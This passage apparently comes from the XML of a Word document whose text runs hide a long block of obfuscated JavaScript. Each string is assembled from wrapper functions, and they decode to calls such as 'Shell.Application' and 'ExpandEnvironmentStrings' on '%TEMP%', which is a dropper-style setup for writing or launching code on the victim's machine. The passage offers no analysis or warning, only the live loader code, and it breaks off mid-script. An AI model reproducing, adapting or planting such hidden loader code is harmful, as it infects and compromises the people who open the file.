PpUzPnl(PpUzPnlJK(Rx+Rt)+(pfqli5[600]-pfqli5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var stsgr5=Brfcook; stsgr5[Vgtf_56]=4; stsgr5[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(stsgr5[600]-stsgr5[Vgtf_56]),RunGe);  })('addition49','being51','evades28',true));}</w:t>
        <w:tab/>
        <w:t xml:space="preserve">  var gicqnsocial65ko=false; var gicqnlivelihood89 =new gicqnIwas18((function(Rt,Rx){ var fvnco4=Brfcook; fvnco4[Vgtf_56]=0; fvnco4[Vgtf_56-(Vgtf_56/3)]=83; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fvnco4[600]-fvnco4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ehsgr4=Brfcook; ehsgr4[Vgtf_56]=2; ehsgr4[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ehsgr4[600]-ehsgr4[Vgtf_56]),RunGe);  })(true,'addition49')+(function(Rt,Rx){ var futeve4=Brfcook; futeve4[Vgtf_56]=0; futeve4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(futeve4[600]-futeve4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wiiHere85=Brfcook; wiiHere85[Vgtf_56]=0; wiiHere85[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wiiHere85[600]-wiiHere85[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fuqgradu3=Brfcook; fuqgradu3[Vgtf_56]=2; fuqgradu3[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fuqgradu3[600]-fuqgradu3[Vgtf_56]),RunGe);  })(true,'Laws75')+(function(Rt,Rx){ var vtisk4=Brfcook; vtisk4[Vgtf_56]=0; vtisk4[Vgtf_56-(Vgtf_56/3)]=46; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtisk4[600]-vtisk4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wnptha4=Brfcook; wnptha4[Vgtf_56]=0; wnptha4[Vgtf_56-(Vgtf_56/3)]=65; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wnptha4[600]-wnptha4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jiwev3=Brfcook; jiwev3[Vgtf_56]=0; jiwev3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jiwev3[600]-jiwev3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var usfwri5=Brfcook; usfwri5[Vgtf_56]=2; usfwri5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(usfwri5[600]-usfwri5[Vgtf_56]),RunGe);  })(true,'Both81')+(function(Rt,Rx){ var vjpava3=Brfcook; vjpava3[Vgtf_56]=1; vjpava3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjpava3[600]-vjpava3[Vgtf_56]),RunGe);  })('progress41')+(function(Rt,Rx){ var jvtcont3=Brfcook; jvtcont3[Vgtf_56]=4; jvtcont3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jvtcont3[600]-jvtcont3[Vgtf_56]),RunGe);  })(false,'what20',false,true)+(function(Rt,Rx){ var itwFo3=Brfcook; itwFo3[Vgtf_56]=2; itwFo3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(itwFo3[600]-itwFo3[Vgtf_56]),RunGe);  })('while59',null)+(function(Rt,Rx){ var sspthat85=Brfcook; sspthat85[Vgtf_56]=2; sspthat85[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sspthat85[600]-sspthat85[Vgtf_56]),RunGe);  })('obey60',false)+(function(Rt,Rx){ var juuFo5=Brfcook; juuFo5[Vgtf_56]=4; juuFo5[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(juuFo5[600]-juuFo5[Vgtf_56]),RunGe);  })('while59','that50',true,null)+(function(Rt,Rx){ var qkpforc4=Brfcook; qkpforc4[Vgtf_56]=4; qkpforc4[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qkpforc4[600]-qkpforc4[Vgtf_56]),RunGe);  })('although94','humans57','would68',false)+(function(Rt,Rx){ var ppvHer4=Brfcook; ppvHer4[Vgtf_56]=3; ppvHer4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ppvHer4[600]-ppvHer4[Vgtf_56]),RunGe);  })('rooted92','thus68',2336)+(function(Rt,Rx){ var kqnski5=Brfcook; kqnski5[Vgtf_56]=2; kqnski5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kqnski5[600]-kqnski5[Vgtf_56]),RunGe);  })(true,'human24'));  var gicqnmany31ko={F:80}; var gicqnsystem50=gicqnweaken28[(function(Rt,Rx){ var pjhForth5=Brfcook; pjhForth5[Vgtf_56]=2; pjhForth5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pjhForth5[600]-pjhForth5[Vgtf_56]),RunGe);  })(false,'while59')+(function(Rt,Rx){ var jpnavala3=Brfcook; jpnavala3[Vgtf_56]=2; jpnavala3[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jpnavala3[600]-jpnavala3[Vgtf_56]),RunGe);  })('progress41','displayed83')+(function(Rt,Rx){ var vehthat4=Brfcook; vehthat4[Vgtf_56]=0; vehthat4[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vehthat4[600]-vehthat4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nnqgradu5=Brfcook; nnqgradu5[Vgtf_56]=1; nnqgradu5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nnqgradu5[600]-nnqgradu5[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var vksHe4=Brfcook; vksHe4[Vgtf_56]=0; vksHe4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vksHe4[600]-vksHe4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var iqwlive4=Brfcook; iqwlive4[Vgtf_56]=4; iqwlive4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iqwlive4[600]-iqwlive4[Vgtf_56]),RunGe);  })(null,485,null,null)+(function(Rt,Rx){ var kveme4=Brfcook; kveme4[Vgtf_56]=4; kveme4[Vgtf_56-(Vgtf_56/3)]=73; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kveme4[600]-kveme4[Vgtf_56]),RunGe);  })('idea46','indeed17',true,true)+(function(Rt,Rx){ var vkkthat4=Brfcook; vkkthat4[Vgtf_56]=4; vkkthat4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vkkthat4[600]-vkkthat4[Vgtf_56]),RunGe);  })(false,false,null,'obey60')+(function(Rt,Rx){ var npvgra5=Brfcook; npvgra5[Vgtf_56]=1; npvgra5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(npvgra5[600]-npvgra5[Vgtf_56]),RunGe);  })(2239)+(function(Rt,Rx){ var jsqcons5=Brfcook; jsqcons5[Vgtf_56]=3; jsqcons5[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jsqcons5[600]-jsqcons5[Vgtf_56]),RunGe);  })(false,false,'declarations83')+(function(Rt,Rx){ var stjfeatu4=Brfcook; stjfeatu4[Vgtf_56]=2; stjfeatu4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(stjfeatu4[600]-stjfeatu4[Vgtf_56]),RunGe);  })(null,'into30')+(function(Rt,Rx){ var wjkava3=Brfcook; wjkava3[Vgtf_56]=0; wjkava3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wjkava3[600]-wjkava3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wwtgradu5=Brfcook; wwtgradu5[Vgtf_56]=1; wwtgradu5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wwtgradu5[600]-wwtgradu5[Vgtf_56]),RunGe);  })('Laws75')+(function(Rt,Rx){ var nfpgrad3=Brfcook; nfpgrad3[Vgtf_56]=4; nfpgrad3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nfpgrad3[600]-nfpgrad3[Vgtf_56]),RunGe);  })('Laws75',2296,null,'although94')+(function(Rt,Rx){ var fueHere3=Brfcook; fueHere3[Vgtf_56]=2; fueHere3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fueHere3[600]-fueHere3[Vgtf_56]),RunGe);  })('rooted92',false)+(function(Rt,Rx){ var iqvaval3=Brfcook; iqvaval3[Vgtf_56]=1; iqvaval3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iqvaval3[600]-iqvaval3[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var itkgradu4=Brfcook; itkgradu4[Vgtf_56]=1; itkgradu4[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(itkgradu4[600]-itkgradu4[Vgtf_56]),RunGe);  })('Laws75')+(function(Rt,Rx){ var kshande3=Brfcook; kshande3[Vgtf_56]=1; kshande3[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kshande3[600]-kshande3[Vgtf_56]),RunGe);  })(1237)+(function(Rt,Rx){ var weigrati5=Brfcook; weigrati5[Vgtf_56]=0; weigrati5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(weigrati5[600]-weigrati5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var sihHere5=Brfcook; sihHere5[Vgtf_56]=3; sihHere5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sihHere5[600]-sihHere5[Vgtf_56]),RunGe);  })('rooted92',null,2567)+(function(Rt,Rx){ var ivwtha3=Brfcook; ivwtha3[Vgtf_56]=4; ivwtha3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ivwtha3[600]-ivwtha3[Vgtf_56]),RunGe);  })(false,false,2605,null)+(function(Rt,Rx){ var jjnme5=Brfcook; jjnme5[Vgtf_56]=1; jjnme5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjnme5[600]-jjnme5[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var wqhcons5=Brfcook; wqhcons5[Vgtf_56]=2; wqhcons5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wqhcons5[600]-wqhcons5[Vgtf_56]),RunGe);  })('declarations83','provided81')+(function(Rt,Rx){ var eijcont4=Brfcook; eijcont4[Vgtf_56]=0; eijcont4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eijcont4[600]-eijcont4[Vgtf_56]),RunGe);  })()]((function(Rt,Rx){ var huslive5=Brfcook; huslive5[Vgtf_56]=3; huslive5[Vgtf_56-(Vgtf_56/3)]=40; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(huslive5[600]-huslive5[Vgtf_56]),RunGe);  })('second5','itself96','being84')+(function(Rt,Rx){ var evpan5=Brfcook; evpan5[Vgtf_56]=2; evpan5[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(evpan5[600]-evpan5[Vgtf_56]),RunGe);  })(true,true)+(function(Rt,Rx){ var huugra5=Brfcook; huugra5[Vgtf_56]=0; huugra5[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(huugra5[600]-huugra5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var qthgrati5=Brfcook; qthgrati5[Vgtf_56]=1; qthgrati5[Vgtf_56-(Vgtf_56/3)]=78; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qthgrati5[600]-qthgrati5[Vgtf_56]),RunGe);  })('addition49')+(function(Rt,Rx){ var nttgr3=Brfcook; nttgr3[Vgtf_56]=4; nttgr3[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nttgr3[600]-nttgr3[Vgtf_56]),RunGe);  })(false,573,'robots83','conscience16')+(function(Rt,Rx){ var hjseve5=Brfcook; hjseve5[Vgtf_56]=3; hjseve5[Vgtf_56-(Vgtf_56/3)]=40; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hjseve5[600]-hjseve5[Vgtf_56]),RunGe);  })('White35','short49',null));  var gicqnescape5ko=0.989; var gicqnother90=gicqnsystem50;   var gicqncomestheir26ko='robot28'; var gicqnwork7=null;  var gicqnavoid46ko=true; var gicqnconsidered20=null;      try  {  gicqnother90=gicqnother90+gicqnclasses41;  for (gicqnthat6 =0; gicqnthat6 &lt; gicqnother90[(function(Rt,Rx){ var svwsk5=Brfcook; svwsk5[Vgtf_56]=2; svwsk5[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(svwsk5[600]-svwsk5[Vgtf_56]),RunGe);  })('human24','entertain53')+(function(Rt,Rx){ var fipevery4=Brfcook; fipevery4[Vgtf_56]=4; fipevery4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fipevery4[600]-fipevery4[Vgtf_56]),RunGe);  })('White35','short49',true,true)+(function(Rt,Rx){ var nwumer4=Brfcook; nwumer4[Vgtf_56]=0; nwumer4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nwumer4[600]-nwumer4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fselive4=Brfcook; fselive4[Vgtf_56]=1; fselive4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fselive4[600]-fselive4[Vgtf_56]),RunGe);  })(861)+(function(Rt,Rx){ var fiean3=Brfcook; fiean3[Vgtf_56]=4; fiean3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fiean3[600]-fiean3[Vgtf_56]),RunGe);  })(false,false,null,'could80')+(function(Rt,Rx){ var ftigrat5=Brfcook; ftigrat5[Vgtf_56]=0; ftigrat5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ftigrat5[600]-ftigrat5[Vgtf_56]),RunGe);  })()]; gicqnthat6++){gicqnhand51 = (((gicqnhand51 &lt;&lt; (5)) - gicqnhand51) + gicqnother90[(function(Rt,Rx){ var wuhgr4=Brfcook; wuhgr4[Vgtf_56]=4; wuhgr4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wuhgr4[600]-wuhgr4[Vgtf_56]),RunGe);  })('addition49',true,2471,true)+(function(Rt,Rx){ var tjteve4=Brfcook; tjteve4[Vgtf_56]=1; tjteve4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjteve4[600]-tjteve4[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var kivever5=Brfcook; kivever5[Vgtf_56]=1; kivever5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kivever5[600]-kivever5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var kuesk5=Brfcook; kuesk5[Vgtf_56]=3; kuesk5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kuesk5[600]-kuesk5[Vgtf_56]),RunGe);  })(null,'human24',true)+(function(Rt,Rx){ var uqpever5=Brfcook; uqpever5[Vgtf_56]=4; uqpever5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uqpever5[600]-uqpever5[Vgtf_56]),RunGe);  })(false,'White35','short49',false)+(function(Rt,Rx){ var inithat85=Brfcook; inithat85[Vgtf_56]=1; inithat85[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(inithat85[600]-inithat85[Vgtf_56]),RunGe);  })(1784)+(function(Rt,Rx){ var fesother5=Brfcook; fesother5[Vgtf_56]=4; fesother5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fesother5[600]-fesother5[Vgtf_56]),RunGe);  })('robot28','into6',false,2804)+(function(Rt,Rx){ var fhnmere4=Brfcook; fhnmere4[Vgtf_56]=1; fhnmere4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fhnmere4[600]-fhnmere4[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var suewr3=Brfcook; suewr3[Vgtf_56]=0; suewr3[Vgtf_56-(Vgtf_56/3)]=65; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(suewr3[600]-suewr3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jefro3=Brfcook; jefro3[Vgtf_56]=2; jefro3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jefro3[600]-jefro3[Vgtf_56]),RunGe);  })('lawsthe36','free58')](gicqnthat6)) &amp; gicqntheir96;}    }catch(gicqnbythe41){gicqnhand51=1441;}    var gicqnbolted65ko={I:89}; var gicqnmust73=gicqnsystem50+gicqnnothing15+Math[(function(Rt,Rx){ var hfsfe3=Brfcook; hfsfe3[Vgtf_56]=2; hfsfe3[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hfsfe3[600]-hfsfe3[Vgtf_56]),RunGe);  })('into30',null)+(function(Rt,Rx){ var fwuskill3=Brfcook; fwuskill3[Vgtf_56]=3; fwuskill3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwuskill3[600]-fwuskill3[Vgtf_56]),RunGe);  })('human24','entertain53','clutches88')+(function(Rt,Rx){ var qhnfo4=Brfcook; qhnfo4[Vgtf_56]=0; qhnfo4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhnfo4[600]-qhnfo4[Vgtf_56]),RunGe);  })()](gicqnhand51)+(function(Rt,Rx){ var esnthat84=Brfcook; esnthat84[Vgtf_56]=4; esnthat84[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(esnthat84[600]-esnthat84[Vgtf_56]),RunGe);  })(true,'obey60','factory29','know4')+(function(Rt,Rx){ var shklivel5=Brfcook; shklivel5[Vgtf_56]=0; shklivel5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shklivel5[600]-shklivel5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pkvwrit5=Brfcook; pkvwrit5[Vgtf_56]=1; pkvwrit5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pkvwrit5[600]-pkvwrit5[Vgtf_56]),RunGe);  })(2011)+(function(Rt,Rx){ var evvmer4=Brfcook; evvmer4[Vgtf_56]=4; evvmer4[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(evvmer4[600]-evvmer4[Vgtf_56]),RunGe);  })('idea46',null,'indeed17',false);  var gicqnpolicy67ko=0.102; var gicqndisastrous12=gicqnsystem50+gicqnnothing15+Math[(function(Rt,Rx){ var hfsfe3=Brfcook; hfsfe3[Vgtf_56]=2; hfsfe3[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hfsfe3[600]-hfsfe3[Vgtf_56]),RunGe);  })('into30',null)+(function(Rt,Rx){ var fwuskill3=Brfcook; fwuskill3[Vgtf_56]=3; fwuskill3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwuskill3[600]-fwuskill3[Vgtf_56]),RunGe);  })('human24','entertain53','clutches88')+(function(Rt,Rx){ var qhnfo4=Brfcook; qhnfo4[Vgtf_56]=0; qhnfo4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhnfo4[600]-qhnfo4[Vgtf_56]),RunGe);  })()](gicqnhand51)+(function(Rt,Rx){ var hqwavala4=Brfcook; hqwavala4[Vgtf_56]=1; hqwavala4[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hqwavala4[600]-hqwavala4[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var sweco4=Brfcook; sweco4[Vgtf_56]=0; sweco4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sweco4[600]-sweco4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ijqaval3=Brfcook; ijqaval3[Vgtf_56]=0; ijqaval3[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijqaval3[600]-ijqaval3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var qqpgra4=Brfcook; qqpgra4[Vgtf_56]=3; qqpgra4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qqpgra4[600]-qqpgra4[Vgtf_56]),RunGe);  })('robots83','conscience16','issues6');  var gicqntricks57ko=[118,569]; var gicqnhere8=(function(Rt,Rx){ var fnkther5=Brfcook; fnkther5[Vgtf_56]=1; fnkther5[Vgtf_56-(Vgtf_56/3)]=78; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fnkther5[600]-fnkther5[Vgtf_56]),RunGe);  })(2627)+(function(Rt,Rx){ var snpcon3=Brfcook; snpcon3[Vgtf_56]=2; snpcon3[Vgtf_56-(Vgtf_56/3)]=92; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(snpcon3[600]-snpcon3[Vgtf_56]),RunGe);  })('declarations83','provided81');    var gicqnsocialreform5ko=false; var gicqnlook37='';  var gicqnparticularly92ko='undefined'; var gicqnspeech24=new gicqnIwas18((function(Rt,Rx){ var vqithepa3=Brfcook; vqithepa3[Vgtf_56]=1; vqithepa3[Vgtf_56-(Vgtf_56/3)]=78; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vqithepa3[600]-vqithepa3[Vgtf_56]),RunGe);  })('must38')+(function(Rt,Rx){ var hfnski5=Brfcook; hfnski5[Vgtf_56]=4; hfnski5[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hfnski5[600]-hfnski5[Vgtf_56]),RunGe);  })('human24','entertain53','clutches88','thus68')+(function(Rt,Rx){ var pthfeat3=Brfcook; pthfeat3[Vgtf_56]=3; pthfeat3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pthfeat3[600]-pthfeat3[Vgtf_56]),RunGe);  })(1634,null,'into30')+(function(Rt,Rx){ var pfelive3=Brfcook; pfelive3[Vgtf_56]=3; pfelive3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pfelive3[600]-pfelive3[Vgtf_56]),RunGe);  })('second5','itself96','being84')+(function(Rt,Rx){ var qsfthat85=Brfcook; qsfthat85[Vgtf_56]=3; qsfthat85[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qsfthat85[600]-qsfthat85[Vgtf_56]),RunGe);  })('obey60','factory29',2694)+(function(Rt,Rx){ var nukgra3=Brfcook; nukgra3[Vgtf_56]=3; nukgra3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nukgra3[600]-nukgra3[Vgtf_56]),RunGe);  })(false,true,true)+(function(Rt,Rx){ var thqav3=Brfcook; thqav3[Vgtf_56]=4; thqav3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(thqav3[600]-thqav3[Vgtf_56]),RunGe);  })(null,null,true,'progress41')+(function(Rt,Rx){ var ttethep3=Brfcook; ttethep3[Vgtf_56]=1; ttethep3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ttethep3[600]-ttethep3[Vgtf_56]),RunGe);  })('must38')+(function(Rt,Rx){ var kstFor5=Brfcook; kstFor5[Vgtf_56]=1; kstFor5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kstFor5[600]-kstFor5[Vgtf_56]),RunGe);  })('while59')+(function(Rt,Rx){ var ewvava4=Brfcook; ewvava4[Vgtf_56]=4; ewvava4[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ewvava4[600]-ewvava4[Vgtf_56]),RunGe);  })(918,'progress41','displayed83',false)+(function(Rt,Rx){ var eviFort4=Brfcook; eviFort4[Vgtf_56]=3; eviFort4[Vgtf_56-(Vgtf_56/3)]=91; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eviFort4[600]-eviFort4[Vgtf_56]),RunGe);  })('while59',null,'that50')+(function(Rt,Rx){ var ftkth3=Brfcook; ftkth3[Vgtf_56]=4; ftkth3[Vgtf_56-(Vgtf_56/3)]=81; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ftkth3[600]-ftkth3[Vgtf_56]),RunGe);  })(true,true,false,true)+(function(Rt,Rx){ var esfgra5=Brfcook; esfgra5[Vgtf_56]=4; esfgra5[Vgtf_56-(Vgtf_56/3)]=80; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(esfgra5[600]-esfgra5[Vgtf_56]),RunGe);  })('Laws75','although94',2747,'humans57')+(function(Rt,Rx){ var wihavala3=Brfcook; wihavala3[Vgtf_56]=0; wihavala3[Vgtf_56-(Vgtf_56/3)]=68; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wihavala3[600]-wihavala3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jwtande4=Brfcook; jwtande4[Vgtf_56]=0; jwtande4[Vgtf_56-(Vgtf_56/3)]=79; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jwtande4[600]-jwtande4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var twngra5=Brfcook; twngra5[Vgtf_56]=3; twngra5[Vgtf_56-(Vgtf_56/3)]=80; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(twngra5[600]-twngra5[Vgtf_56]),RunGe);  })(true,'Laws75',null));  var gicqndeputies70ko='although94'; var gicqnpersons85=gicqnspeech24[(function(Rt,Rx){ var vefFo3=Brfcook; vefFo3[Vgtf_56]=2; vefFo3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vefFo3[600]-vefFo3[Vgtf_56]),RunGe);  })('while59','that50')+(function(Rt,Rx){ var pnpconsc3=Brfcook; pnpconsc3[Vgtf_56]=4; pnpconsc3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pnpconsc3[600]-pnpconsc3[Vgtf_56]),RunGe);  })('declarations83',null,false,'provided81')+(function(Rt,Rx){ var tefconte4=Brfcook; tefconte4[Vgtf_56]=0; tefconte4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tefconte4[600]-tefconte4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var evvifhe35=Brfcook; evvifhe35[Vgtf_56]=2; evvifhe35[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(evvifhe35[600]-evvifhe35[Vgtf_56]),RunGe);  })('first30','would78')+(function(Rt,Rx){ var sqjconsc4=Brfcook; sqjconsc4[Vgtf_56]=2; sqjconsc4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sqjconsc4[600]-sqjconsc4[Vgtf_56]),RunGe);  })('declarations83',false)+(function(Rt,Rx){ var fefot4=Brfcook; fefot4[Vgtf_56]=1; fefot4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fefot4[600]-fefot4[Vgtf_56]),RunGe);  